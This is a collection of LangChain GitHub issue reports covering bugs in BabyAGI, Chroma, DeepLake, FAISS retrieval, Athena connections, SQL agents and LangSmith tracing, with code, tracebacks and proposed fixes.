    temperature=0,
    max_tokens=1500,
    top_p=0.95,
)

embeddings_model = CohereEmbeddings(model="embed-english-v2.0")
index = faiss.IndexFlatL2(4096)
vectorstore = FAISS(embeddings_model.embed_query, index, InMemoryDocstore({}), {})

# set the goal
goal = "Plan a trip to the Grand Canyon"

# create the babyagi agent
# If max_iterations is None, the agent may go on forever if stuck in loops
baby_agi = BabyAGI.from_llm(
    llm=llm,
    vectorstore=vectorstore,
    verbose=False,
    max_iterations=3,
)

response = baby_agi({"objective": goal})
print(response)
```
Error:
`ValueError: Tried to add ids that already exist: {'result_1'}`
Traceback:
```
File "/user-venvs-build/14abfc95cf32/.venv/lib/python3.10/site-packages/streamlit/runtime/scriptrunner/script_runner.py", line 552, in _run_script
exec(code, module.__dict__)
File "/app/run/multipage/pages/8_Exp_Baby_AGI.py", line 61, in <module>
response = baby_agi({"objective": goal})
File "/user-venvs-build/14abfc95cf32/.venv/lib/python3.10/site-packages/langchain/chains/base.py", line 243, in __call__
raise e
File "/user-venvs-build/14abfc95cf32/.venv/lib/python3.10/site-packages/langchain/chains/base.py", line 237, in __call__
self._call(inputs, run_manager=run_manager)
File "/user-venvs-build/14abfc95cf32/.venv/lib/python3.10/site-packages/langchain/experimental/autonomous_agents/baby_agi/baby_agi.py", line 142, in _call
self.vectorstore.add_texts(
File "/user-venvs-build/14abfc95cf32/.venv/lib/python3.10/site-packages/langchain/vectorstores/faiss.py", line 150, in add_texts
return self.__add(texts, embeddings, metadatas=metadatas, ids=ids, **kwargs)
File "/user-venvs-build/14abfc95cf32/.venv/lib/python3.10/site-packages/langchain/vectorstores/faiss.py", line 121, in __add
self.docstore.add({_id: doc for _, _id, doc in full_info})
File "/user-venvs-build/14abfc95cf32/.venv/lib/python3.10/site-packages/langchain/docstore/in_memory.py", line 19, in add
raise ValueError(f"Tried to add ids that already exist: {overlapping}")
```
### Expected behavior
I would expect the agent to run and generate the desired output instead of the error: `ValueError: Tried to add ids that already exist: {'result_1'}`.
It seems that the error is happening in this class: `BabyAGI` > `_call` > "# Step 3: Store the result in Pinecone".
I was able to fix this by assigning a random number to each iteration of `result_id`; here is the fix, however, this is not working in the experimental BabyAGI instance.
Fix:
```python
import random

# Step 3: Store the result in Pinecone
result_id = f"result_{task['task_id']}_{random.randint(0, 1000)}"
self.vectorstore.add_texts(
    texts=[result],
    metadatas=[{"task": task["task_name"]}],
    ids=[result_id],
)
```
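A collision-proof variant of the same idea, as a sketch (swapping the bounded random integer for `uuid4`, so repeated runs can never reuse an id):

```python
import uuid

result_id = f"result_{task['task_id']}_{uuid.uuid4().hex}"
```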
Thank you :) | BabyAGI: Error storing results in vdb | https://api.github.com/repos/langchain-ai/langchain/issues/7445/comments | 5 | 2023-07-09T20:31:00Z | 2023-10-19T16:06:19Z | https://github.com/langchain-ai/langchain/issues/7445 | 1,795,551,743 | 7,445 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
Hi. I'm trying to test the `DuckDuckGoSearchRun` tool by running the basic example from the documentation: https://python.langchain.com/docs/modules/agents/tools/integrations/ddg. I have already installed the certificates without any errors:
```
./Install\ Certificates.command
 -- pip install --upgrade certifi
Requirement already satisfied: certifi in /Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages (2023.5.7)
 -- removing any existing file or link
 -- creating symlink to certifi certificate bundle
 -- setting permissions
 -- update complete
```
But even after doing that, and even when I set verify to false, I still get an SSL certificate error:
```python
import ssl
import duckduckgo_search
from lxml import html

from langchain.tools import DuckDuckGoSearchRun

DuckDuckGoSearchRun.requests_kwargs = {'verify': False}
search = DuckDuckGoSearchRun()
search.run("Obama's first name?")
```
Here is the error:
```
---------------------------------------------------------------------------
SSLCertVerificationError Traceback (most recent call last)
File [/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/httpcore/_exceptions.py:10](https://file+.vscode-resource.vscode-cdn.net/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/httpcore/_exceptions.py:10), in map_exceptions(map)
9 try:
---> 10 yield
11 except Exception as exc: # noqa: PIE786
File [/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/httpcore/backends/sync.py:62](https://file+.vscode-resource.vscode-cdn.net/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/httpcore/backends/sync.py:62), in SyncStream.start_tls(self, ssl_context, server_hostname, timeout)
61 self.close()
---> 62 raise exc
63 return SyncStream(sock)
File [/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/httpcore/backends/sync.py:57](https://file+.vscode-resource.vscode-cdn.net/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/httpcore/backends/sync.py:57), in SyncStream.start_tls(self, ssl_context, server_hostname, timeout)
56 self._sock.settimeout(timeout)
---> 57 sock = ssl_context.wrap_socket(
58 self._sock, server_hostname=server_hostname
59 )
60 except Exception as exc: # pragma: nocover
File [/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/ssl.py:517](https://file+.vscode-resource.vscode-cdn.net/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/ssl.py:517), in SSLContext.wrap_socket(self, sock, server_side, do_handshake_on_connect, suppress_ragged_eofs, server_hostname, session)
511 def wrap_socket(self, sock, server_side=False,
512 do_handshake_on_connect=True,
513 suppress_ragged_eofs=True,
514 server_hostname=None, session=None):
515 # SSLSocket class handles server_hostname encoding before it calls
516 # ctx._wrap_socket()
--> 517 return self.sslsocket_class._create(
518 sock=sock,
519 server_side=server_side,
520 do_handshake_on_connect=do_handshake_on_connect,
521 suppress_ragged_eofs=suppress_ragged_eofs,
522 server_hostname=server_hostname,
523 context=self,
524 session=session
525 )
File [/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/ssl.py:1075](https://file+.vscode-resource.vscode-cdn.net/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/ssl.py:1075), in SSLSocket._create(cls, sock, server_side, do_handshake_on_connect, suppress_ragged_eofs, server_hostname, context, session)
1074 raise ValueError("do_handshake_on_connect should not be specified for non-blocking sockets")
-> 1075 self.do_handshake()
1076 except (OSError, ValueError):
File [/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/ssl.py:1346](https://file+.vscode-resource.vscode-cdn.net/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/ssl.py:1346), in SSLSocket.do_handshake(self, block)
1345 self.settimeout(None)
-> 1346 self._sslobj.do_handshake()
1347 finally:
SSLCertVerificationError: [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: self signed certificate in certificate chain (_ssl.c:992)
During handling of the above exception, another exception occurred:
ConnectError Traceback (most recent call last)
```
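A hedged workaround sketch: point the process at certifi's CA bundle through the standard environment variables, assuming the underlying HTTP client honors `SSL_CERT_FILE` (httpx and Python's `ssl` module do). Note the message says "self signed certificate in certificate chain", which usually means a proxy or security appliance is injecting its own certificate; in that case its root CA has to be appended to the bundle instead.

```python
import os
import certifi

# Set these before any HTTP client or SSL context is created.
os.environ["SSL_CERT_FILE"] = certifi.where()
os.environ["REQUESTS_CA_BUNDLE"] = certifi.where()

from langchain.tools import DuckDuckGoSearchRun

print(DuckDuckGoSearchRun().run("Obama's first name?"))
```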
### Suggestion:
_No response_ | SSL certificate problem (even when verify = False) | https://api.github.com/repos/langchain-ai/langchain/issues/7443/comments | 1 | 2023-07-09T19:15:44Z | 2023-10-15T16:04:38Z | https://github.com/langchain-ai/langchain/issues/7443 | 1,795,527,141 | 7,443 |
[
"hwchase17",
"langchain"
]
| ### System Info
langchain: 0.0.215
python: 3.10.11
OS: Ubuntu 18.04
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [X] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
While querying a SQL database, the agent gets stuck in an infinite loop due to `list_tables_sql_db` not being a valid tool.
```
> Entering new chain...
Action: list_tables_sql_db
Action Input:
Observation: list_tables_sql_db is not a valid tool, try another one.
Thought:I should look at the tables in the database to see what I can query. Then I should query the schema of the most relevant tables.
Action: list_tables_sql_db
Action Input:
Observation: list_tables_sql_db is not a valid tool, try another one.
Thought:I should look at the tables in the database to see what I can query. Then I should query the schema of the most relevant tables.
Action: list_tables_sql_db
Action Input:
Observation: list_tables_sql_db is not a valid tool, try another one.
Thought:I don't know how to answer this question.
Thought: I now know the final answer
Final Answer: I don't know
> Finished chain.
```
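Possibly relevant (an assumption, not confirmed by the report): newer LangChain releases renamed the SQL toolkit tools from `list_tables_sql_db` / `schema_sql_db` / `query_sql_db` to `sql_db_list_tables` / `sql_db_schema` / `sql_db_query`, so an agent driven by a prompt that still cites the old names will keep requesting a tool that no longer exists. A sketch that lets the toolkit supply matching tool names and prompt:

```python
from langchain.agents import create_sql_agent
from langchain.agents.agent_toolkits import SQLDatabaseToolkit
from langchain.llms import OpenAI
from langchain.sql_database import SQLDatabase

db = SQLDatabase.from_uri("sqlite:///example.db")  # hypothetical connection string
llm = OpenAI(temperature=0)
agent = create_sql_agent(llm=llm, toolkit=SQLDatabaseToolkit(db=db, llm=llm), verbose=True)
agent.run("How many tables are there?")
```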
### Expected behavior
The agent should get the list of tables by using the `list_tables_sql_db` tool and then query the most relevant one. | list_tables_sql_db is not a valid tool, try another one. | https://api.github.com/repos/langchain-ai/langchain/issues/7440/comments | 3 | 2023-07-09T18:10:42Z | 2024-03-10T15:17:49Z | https://github.com/langchain-ai/langchain/issues/7440 | 1,795,505,933 | 7,440 |
[
"hwchase17",
"langchain"
]
| ### Issue with current documentation:
https://python.langchain.com/docs/modules/data_connection/vectorstores/integrations/chroma.html#basic-example-including-saving-to-disk
## Environment
- macOS
- Python 3.10.9
- langchain 0.0.228
- chromadb 0.3.26
Use https://github.com/hwchase17/langchain/blob/v0.0.228/docs/extras/modules/state_of_the_union.txt
## Procedure
1. Run the following Python script
ref: https://github.com/hwchase17/langchain/blob/v0.0.228/docs/extras/modules/data_connection/vectorstores/integrations/chroma.ipynb
```diff
# import
from langchain.embeddings.sentence_transformer import SentenceTransformerEmbeddings
from langchain.text_splitter import CharacterTextSplitter
from langchain.vectorstores import Chroma
from langchain.document_loaders import TextLoader
# load the document and split it into chunks
loader = TextLoader("../../../state_of_the_union.txt")
documents = loader.load()
# split it into chunks
text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0)
docs = text_splitter.split_documents(documents)
# create the open-source embedding function
embedding_function = SentenceTransformerEmbeddings(model_name="all-MiniLM-L6-v2")
# load it into Chroma
db = Chroma.from_documents(docs, embedding_function)
# query it
query = "What did the president say about Ketanji Brown Jackson"
docs = db.similarity_search(query)
# print results
print(docs[0].page_content)
# save to disk
db2 = Chroma.from_documents(docs, embedding_function, persist_directory="./chroma_db")
db2.persist()
-docs = db.similarity_search(query)
+docs = db2.similarity_search(query)
# load from disk
db3 = Chroma(persist_directory="./chroma_db")
-docs = db.similarity_search(query)
+docs = db3.similarity_search(query) # ValueError raised
print(docs[0].page_content)
```
## Expected behavior
`print(docs[0].page_content)` with db3
## Actual behavior
>ValueError: You must provide embeddings or a function to compute them
```
Traceback (most recent call last):
File "/.../issue_report.py", line 35, in <module>
docs = db3.similarity_search(query)
File "/.../venv/lib/python3.10/site-packages/langchain/vectorstores/chroma.py", line 174, in similarity_search
docs_and_scores = self.similarity_search_with_score(query, k, filter=filter)
File "/.../venv/lib/python3.10/site-packages/langchain/vectorstores/chroma.py", line 242, in similarity_search_with_score
results = self.__query_collection(
File "/.../venv/lib/python3.10/site-packages/langchain/utils.py", line 55, in wrapper
return func(*args, **kwargs)
File "/.../venv/lib/python3.10/site-packages/langchain/vectorstores/chroma.py", line 121, in __query_collection
return self._collection.query(
File "/.../venv/lib/python3.10/site-packages/chromadb/api/models/Collection.py", line 209, in query
raise ValueError(
ValueError: You must provide embeddings or a function to compute them
```
### Idea or request for content:
Fixed by specifying the `embedding_function` parameter.
```diff
-db3 = Chroma(persist_directory="./chroma_db")
+db3 = Chroma(persist_directory="./chroma_db", embedding_function=embedding_function)
docs = db3.similarity_search(query)
print(docs[0].page_content)
```
(Added) ref: https://github.com/hwchase17/langchain/blob/v0.0.228/langchain/vectorstores/chroma.py#L62 | DOC: Bug in loading Chroma from disk (vectorstores/integrations/chroma) | https://api.github.com/repos/langchain-ai/langchain/issues/7436/comments | 2 | 2023-07-09T17:05:24Z | 2023-07-10T11:17:19Z | https://github.com/langchain-ai/langchain/issues/7436 | 1,795,484,020 | 7,436 |
[
"hwchase17",
"langchain"
]
| ### Issue with current documentation:
I followed the documentation @ https://python.langchain.com/docs/use_cases/code/twitter-the-algorithm-analysis-deeplake.
I replaced 'twitter-the-algorithm' with another code base I'm analyzing and used my own credentials from OpenAI and Deep Lake.
When I run the code (on VS Code for Mac with M1 chip), I get the following error:
```
ValueError: setting an array element with a sequence. The requested array has an inhomogeneous shape after 1 dimensions. The detected shape was (1435,) + inhomogeneous part.
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/Users/catherineswope/Desktop/LangChain/fromLangChain.py", line 37, in <module>
db.add_documents(texts)
File "/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/langchain/vectorstores/base.py", line 91, in add_documents
return self.add_texts(texts, metadatas, **kwargs)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/langchain/vectorstores/deeplake.py", line 184, in add_texts
return self.vectorstore.add(
^^^^^^^^^^^^^^^^^^^^^
File "/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/deeplake/core/vectorstore/deeplake_vectorstore.py", line 271, in add
dataset_utils.extend_or_ingest_dataset(
File "/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/deeplake/core/vectorstore/vector_search/dataset/dataset.py", line 409, in extend_or_ingest_dataset
raise IncorrectEmbeddingShapeError()
deeplake.util.exceptions.IncorrectEmbeddingShapeError: The embedding function returned embeddings of different shapes. Please either use different embedding function or exclude invalid files that are not supported by the embedding function.
```
This is the code snippet from my actual code:
```python
import os
import getpass

from langchain.embeddings.openai import OpenAIEmbeddings
from langchain.vectorstores import DeepLake
from langchain.document_loaders import TextLoader

# get OPENAI API KEY and ACTIVELOOP_TOKEN
os.environ["OPENAI_API_KEY"] = getpass.getpass("OpenAI API Key:")
os.environ["ACTIVELOOP_TOKEN"] = getpass.getpass("Activeloop Token:")

embeddings = OpenAIEmbeddings(disallowed_special=())

# clone from chattydocs git hub repo removedcomments branch and copy/paste path
root_dir = "/Users/catherineswope/chattydocs/incubator-baremaps-0.7.1-removedcomments"
docs = []
for dirpath, dirnames, filenames in os.walk(root_dir):
    for file in filenames:
        try:
            loader = TextLoader(os.path.join(dirpath, file), encoding="utf-8")
            docs.extend(loader.load_and_split())
        except Exception as e:
            pass

from langchain.text_splitter import CharacterTextSplitter

text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0)
texts = text_splitter.split_documents(docs)

username = "caswvu"  # replace with your username from app.activeloop.ai
db = DeepLake(
    dataset_path=f"hub://caswvu/baremaps",
    embedding_function=embeddings,
)
db.add_documents(texts)

db = DeepLake(
    dataset_path="hub://caswvu/baremaps",
    read_only=True,
    embedding_function=embeddings,
)

retriever = db.as_retriever()
retriever.search_kwargs["distance_metric"] = "cos"
retriever.search_kwargs["fetch_k"] = 100
retriever.search_kwargs["maximal_marginal_relevance"] = True
retriever.search_kwargs["k"] = 10

from langchain.chat_models import ChatOpenAI
from langchain.chains import ConversationalRetrievalChain

model = ChatOpenAI(model_name="gpt-3.5-turbo")  # switch to 'gpt-4'
qa = ConversationalRetrievalChain.from_llm(model, retriever=retriever)

questions = [
    "What does this code do?",
]
chat_history = []

for question in questions:
    result = qa({"question": question, "chat_history": chat_history})
    chat_history.append((question, result["answer"]))
    print(f"-> **Question**: {question} \n")
    print(f"**Answer**: {result['answer']} \n")
```
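One hedged guess at the cause: repositories often contain files the embedding endpoint cannot handle cleanly (empty chunks, binary files read as text), and an embedding function that fails or truncates on some inputs would produce exactly this kind of inhomogeneous-shape error. A sketch that drops empty or whitespace-only chunks before ingesting; whether that covers this repository's contents is an assumption:

```python
texts = [t for t in texts if t.page_content and t.page_content.strip()]
db.add_documents(texts)
```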
### Idea or request for content:
Can you please help me understand how to fix the code to address the error message? Also, if applicable, please address this in the documentation so that others can avoid it as well. Thank you! | DOC: Code/twitter-the-algorithm-analysis-deeplake not working as written | https://api.github.com/repos/langchain-ai/langchain/issues/7435/comments | 8 | 2023-07-09T15:55:06Z | 2023-10-19T16:06:23Z | https://github.com/langchain-ai/langchain/issues/7435 | 1,795,458,482 | 7,435 |
[
"hwchase17",
"langchain"
]
| ### System Info
```
$ uname -a
MINGW64_NT-10.0-19045 LAPTOP-4HTFESLT 3.3.6-341.x86_64 2022-09-05 20:28 UTC x86_64 Msys
$ python --version
Python 3.10.11
$ pip show langchain
Name: langchain
Version: 0.0.228
Summary: Building applications with LLMs through composability
Home-page: https://www.github.com/hwchase17/langchain
Author:
Author-email:
License: MIT
Location: c:\users\happy\appdata\local\packages\pythonsoftwarefoundation.python.3.10_qbz5n2kfra8p0\localcache\local-packages\python310\site-packages
Requires: aiohttp, async-timeout, dataclasses-json, langchainplus-sdk, numexpr, numpy, openapi-schema-pydantic, pydantic, PyYAML, requests, SQLAlchemy, tenacity
Required-by:
```
### Who can help?
I cannot get a trace on langchain. Error:
```
File "c:\Users\happy\Documents\Projects\askjane\.venv\lib\site-packages\langchain\callbacks\manager.py", line 1702, in _configure
logger.warning(
Message: 'Unable to load requested LangChainTracer. To disable this warning, unset the LANGCHAIN_TRACING_V2 environment variables.'
Arguments: (LangChainPlusUserError('API key must be provided when using hosted LangChain+ API'),)
```
I do this check:
```
print(os.environ["LANGCHAIN-API-KEY"])
```
the correct LangChainPlus/LangSmith API key is shown. I thought this was how it was done. I do set the other OS environment variables.
It doesn't pick up my API key.
I apologize if I am doing something stupid, but it's not working to the best of my knowledge.
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```python
import os

os.environ["OPENAI_API_KEY"] = "..."
os.environ["LANGCHAIN-API-KEY"] = "..."
os.environ["LANGCHAIN_TRACING_V2"] = "true"
os.environ["LANGCHAIN_ENDPOINT"] = "https://api.langchain.plus"
os.environ["LANGCHAIN_PROJECT"] = "Explore Evaluating index using LLM"

print(os.environ["LANGCHAIN-API-KEY"])

from langchain import OpenAI

OpenAI().predict("Hello, world!")
```
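A hedged observation: the tracer reads `LANGCHAIN_API_KEY` (underscores), while the script above sets `LANGCHAIN-API-KEY` (hyphens), which `os.environ` treats as an entirely different variable, so the `print` succeeds even though LangChain never sees the key. A sketch with the underscore spelling:

```python
import os

os.environ["LANGCHAIN_API_KEY"] = "..."  # underscores, not hyphens
os.environ["LANGCHAIN_TRACING_V2"] = "true"
```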
### Expected behavior
Go to LangSmith and see the trace. | Have set my langchain+ tracing key, it is not being recognized | https://api.github.com/repos/langchain-ai/langchain/issues/7431/comments | 3 | 2023-07-09T14:50:31Z | 2024-08-08T13:14:06Z | https://github.com/langchain-ai/langchain/issues/7431 | 1,795,434,040 | 7,431 |
[
"hwchase17",
"langchain"
]
| ### System Info
langchain==0.0.216
langchainplus-sdk==0.0.17
python==3.10
I'm trying to connect SQLDatabaseChain to AWS Athena and getting the following error:
```
conString = f"awsathena+rest://{AWS_ACCESS_KEY_ID}:{AWS_SECRET_ACCESS_KEY}@athena.{AWS_REGION_ID}.amazonaws.com/{DATABASE}"
engine_args={
's3_staging_dir': "s3://mybuckets3/",
'work_group':'primary'
}
db = SQLDatabase.from_uri(database_uri=conString, engine_args=engine_args)
TypeError Traceback (most recent call last)
Cell In[14], line 2
1 #db = SQLDatabase.from_uri(conString)
----> 2 db = SQLDatabase.from_uri(database_uri=conString, engine_args=engine_args)
File ~\.conda\envs\generativeai\lib\site-packages\langchain\sql_database.py:124, in SQLDatabase.from_uri(cls, database_uri, engine_args, **kwargs)
122 """Construct a SQLAlchemy engine from URI."""
123 _engine_args = engine_args or {}
--> 124 return cls(create_engine(database_uri, **_engine_args), **kwargs)
File <string>:2, in create_engine(url, **kwargs)
File ~\.conda\envs\generativeai\lib\site-packages\sqlalchemy\util\deprecations.py:281, in deprecated_params.<locals>.decorate.<locals>.warned(fn, *args, **kwargs)
274 if m in kwargs:
275 _warn_with_version(
276 messages[m],
277 versions[m],
278 version_warnings[m],
279 stacklevel=3,
280 )
--> 281 return fn(*args, **kwargs)
File ~\.conda\envs\generativeai\lib\site-packages\sqlalchemy\engine\create.py:680, in create_engine(url, **kwargs)
678 # all kwargs should be consumed
679 if kwargs:
--> 680 raise TypeError(
681 "Invalid argument(s) %s sent to create_engine(), "
682 "using configuration %s/%s/%s. Please check that the "
683 "keyword arguments are appropriate for this combination "
684 "of components."
685 % (
686 ",".join("'%s'" % k for k in kwargs),
687 dialect.__class__.__name__,
688 pool.__class__.__name__,
689 engineclass.__name__,
690 )
691 )
693 engine = engineclass(pool, dialect, u, **engine_args)
695 if _initialize:
TypeError: Invalid argument(s) 's3_staging_dir','work_group' sent to create_engine(), using configuration AthenaRestDialect/QueuePool/Engine. Please check that the keyword arguments are appropriate for this combination of components.
```
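A hedged sketch of the usual fix: with the PyAthena dialect, `s3_staging_dir` and `work_group` are connection-string query parameters rather than `create_engine()` keyword arguments (the exact URI shape is taken from PyAthena's documentation; values should be URL-encoded):

```python
from urllib.parse import quote_plus

from langchain.sql_database import SQLDatabase

conn_str = (
    f"awsathena+rest://{AWS_ACCESS_KEY_ID}:{quote_plus(AWS_SECRET_ACCESS_KEY)}"
    f"@athena.{AWS_REGION_ID}.amazonaws.com:443/{DATABASE}"
    f"?s3_staging_dir={quote_plus('s3://mybuckets3/')}&work_group=primary"
)
db = SQLDatabase.from_uri(conn_str)
```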
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [X] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Above
### Expected behavior
LangChain connected to AWS Athena. | SQLDatabase and SQLDatabaseChain with AWS Athena | https://api.github.com/repos/langchain-ai/langchain/issues/7430/comments | 12 | 2023-07-09T13:46:19Z | 2024-02-27T16:08:30Z | https://github.com/langchain-ai/langchain/issues/7430 | 1,795,409,409 | 7,430 |
[
"hwchase17",
"langchain"
]
| ### System Info (M1 mac)
Python implementation: CPython
Python version : 3.11.4
IPython version : 8.14.0
Compiler : GCC 12.2.0
OS : Linux
Release : 5.15.49-linuxkit-pr
Machine : aarch64
Processor : CPU cores : 5
Architecture: 64bit
[('aiohttp', '3.8.4'), ('aiosignal', '1.3.1'), ('asttokens', '2.2.1'), ('async-timeout', '4.0.2'), ('attrs', '23.1.0'), ('backcall', '0.2.0'), ('blinker', '1.6.2'), ('certifi', '2023.5.7'), ('charset-normalizer', '3.2.0'), ('click', '8.1.4'), ('dataclasses-json', '0.5.9'), ('decorator', '5.1.1'), ('docarray', '0.35.0'), ('executing', '1.2.0'), ('faiss-cpu', '1.7.4'), ('flask', '2.3.2'), ('frozenlist', '1.3.3'), ('greenlet', '2.0.2'), ('idna', '3.4'), ('importlib-metadata', '6.8.0'), ('ipython', '8.14.0'), ('itsdangerous', '2.1.2'), ('jedi', '0.18.2'), ('jinja2', '3.1.2'), ('json5', '0.9.14'), **('langchain', '0.0.228'), ('langchainplus-sdk', '0.0.20')**, ('markdown-it-py', '3.0.0'), ('markupsafe', '2.1.3'), ('marshmallow', '3.19.0'), ('marshmallow-enum', '1.5.1'), ('matplotlib-inline', '0.1.6'), ('mdurl', '0.1.2'), ('multidict', '6.0.4'), ('mypy-extensions', '1.0.0'), ('numexpr', '2.8.4'), ('numpy', '1.25.1'), ('openai', '0.27.8'), ('openapi-schema-pydantic', '1.2.4'), ('orjson', '3.9.2'), ('packaging', '23.1'), ('parso', '0.8.3'), ('pexpect', '4.8.0'), ('pickleshare', '0.7.5'), ('pip', '23.1.2'), ('prompt-toolkit', '3.0.39'), ('psycopg2-binary', '2.9.6'), ('ptyprocess', '0.7.0'), ('pure-eval', '0.2.2'), ('pydantic', '1.10.11'), ('pygments', '2.15.1'), ('python-dotenv', '1.0.0'), ('python-json-logger', '2.0.7'), ('pyyaml', '6.0'), ('regex', '2023.6.3'), ('requests', '2.31.0'), ('rich', '13.4.2'), ('setuptools', '65.5.1'), ('six', '1.16.0'), ('slack-bolt', '1.18.0'), ('slack-sdk', '3.21.3'), ('sqlalchemy', '2.0.18'), ('stack-data', '0.6.2'), ('tenacity', '8.2.2'), ('tiktoken', '0.4.0'), ('tqdm', '4.65.0'), ('traitlets', '5.9.0'), ('types-requests', '2.31.0.1'), ('types-urllib3', '1.26.25.13'), ('typing-inspect', '0.9.0'), ('typing_extensions', '4.7.1'), ('urllib3', '2.0.3'), ('watermark', '2.4.3'), ('wcwidth', '0.2.6'), ('werkzeug', '2.3.6'), ('wheel', '0.40.0'), ('yarl', '1.9.2'), ('zipp', '3.16.0')]
### Who can help?
@hwchase17
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```python
target_query = 'What are the hyve rules?'
facts_docs = [
Document(page_content=f)
for f in [x.strip() for x in """
Under the banner of privacy, hyve empowers you to determine the visibility of your goals, providing you with options like Public (all hyve members can see your goal), Friends (only your trusted hyve connections can), and Private (for secret missions where you can personally invite the desired ones)
At hyve, we're all about protecting your details and your privacy, making sure everything stays safe and secure
The main goal of hyve is to provide you with the tools to reach your financial goals as quickly as possible, our motto is: "Get there faster!"
Resting as the sole financial community composed entirely of 100% verified real users, hyve assures that each user is genuine and verified, enhancing the safety of you and our community
Designed with privacy as a top priority, hyve puts the power in your hands to control exactly who you share your goals with
hyve prioritizes your personal data protection and privacy rights, using your data exclusively to expedite the achievement of your goals without sharing your information with any other parties, for more info please visit https://app.letshyve.com/privacy-policy
Being the master of your privacy and investment strategies, you have full control over your goal visibility, making hyve a perfect partner for your financial journey
The Round-Up Rule in hyve integrates savings into your daily habits by rounding up your everyday expenses, depositing the surplus into your savings goal, e.g. if you purchase a cup of coffee for $2.25, hyve rounds it up to $3, directing the $0.75 difference to your savings
The Automatic Rule in hyve enables our AI engine to analyze your income and spending habits, thereby determining how much you can safely save, so you don't have to worry about it
The Recurring Rule in hyve streamlines your savings by automatically transferring a specified amount to your savings on a set schedule, making saving as effortless as possible
The Matching Rule in hyve allows you to double your savings by having another user match every dollar you save towards a goal, creating a savings buddy experience
""".strip().split('\n')]
]
retriever = FAISS.from_documents(facts_docs, OpenAIEmbeddings())
docs = '\n'.join(d.page_content for d in retriever.similarity_search(target_query, k=10))
print(docs)
for a in ['Round-Up', 'Automatic', 'Recurring', 'Matching']:
assert a in docs, f'{a} not in docs'
```
### Expected behavior
The words that carry the most information in the query are `hyve` and `rule`, so it should return the lines that define the `Round-Up Rule in hyve`, `Automatic Rule in hyve`, `Recurring Rule in hyve`, and `Matching Rule in hyve`.
instead, the best 2 result it finds are:
> At hyve, we're all about protecting your details and your privacy, making sure everything stays safe and secure
and
> Under the banner of privacy, hyve empowers you to determine the visibility of your goals, providing you with options like Public (all hyve members can see your goal), Friends (only your trusted hyve connections can), and Private (for secret missions where you can personally invite the desired ones)
which don't even have the word `rule` in them or have anything to do with rules.
The full list of results are:
```
At hyve, we're all about protecting your details and your privacy, making sure everything stays safe and secure
Under the banner of privacy, hyve empowers you to determine the visibility of your goals, providing you with options like Public (all hyve members can see your goal), Friends (only your trusted hyve connections can), and Private (for secret missions where you can personally invite the desired ones)
The Automatic Rule in hyve enables our AI engine to analyze your income and spending habits, thereby determining how much you can safely save, so you don't have to worry about it
Designed with privacy as a top priority, hyve puts the power in your hands to control exactly who you share your goals with
The main goal of hyve is to provide you with the tools to reach your financial goals as quickly as possible, our motto is: "Get there faster!"
Resting as the sole financial community composed entirely of 100% verified real users, hyve assures that each user is genuine and verified, enhancing the safety of you and our community
hyve prioritizes your personal data protection and privacy rights, using your data exclusively to expedite the achievement of your goals without sharing your information with any other parties, for more info please visit https://app.letshyve.com/privacy-policy
The Recurring Rule in hyve streamlines your savings by automatically transferring a specified amount to your savings on a set schedule, making saving as effortless as possible
The Matching Rule in hyve allows you to double your savings by having another user match every dollar you save towards a goal, creating a savings buddy experience
Being the master of your privacy and investment strategies, you have full control over your goal visibility, making hyve a perfect partner for your financial journey
```
which don't even include the `Round-Up Rule in hyve` line in the top 10.
